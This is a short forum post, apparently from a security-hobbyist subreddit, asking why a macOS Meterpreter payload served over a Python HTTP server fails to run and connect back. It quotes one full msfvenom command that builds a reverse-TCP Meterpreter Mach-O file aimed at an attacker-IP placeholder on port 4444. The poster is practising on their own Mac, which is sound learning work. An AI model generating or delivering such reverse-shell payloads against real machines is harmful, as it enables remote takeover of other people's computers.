Advice with generating a reverse shell executable payload that works on a Macbook.

So I’ve been playing around with msfvenom and I want to try establish a connection to my Mac. However, I can’t seem to get any executable files to run when clicked on from my python http server, instead it just opens up the contents of the file and my multi handler doesn’t establish any connection. Below is the payload I’ve been previously generating:

msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST=<attackers IP> LPORT=4444 -f macho -o payload.sh

Any help is greatly appreciated, been stuck on this for too long!

submitted by /u/Technical-Weather-60
[link] [comments]

May 17, 2023
Read More >>